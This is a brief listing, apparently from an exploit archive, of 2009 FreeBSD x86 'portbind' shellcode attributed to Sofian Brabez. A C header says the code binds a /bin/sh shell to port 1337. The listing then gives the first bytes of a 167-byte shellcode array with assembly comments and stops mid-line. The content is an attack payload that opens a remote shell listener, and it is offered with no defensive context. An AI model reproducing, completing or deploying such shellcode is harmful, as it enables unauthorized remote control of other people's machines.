freebsd/x86 portbind shellcode 167 bytes
No description provided by source. /- Copyright c 2009, Sofian Brabez [email protected] freebsd-x86-portbind.c - FreeBSD x86 portbind a shell /bin/sh on 1337 \x05\x39 167 bytes / const char shellcode = "\x6a\x00" // push $0x0 "\x6a\x01" // push $0x1 "\x6a\x02" // push $0x2 "\x50" // push %eax "\x6a\x6...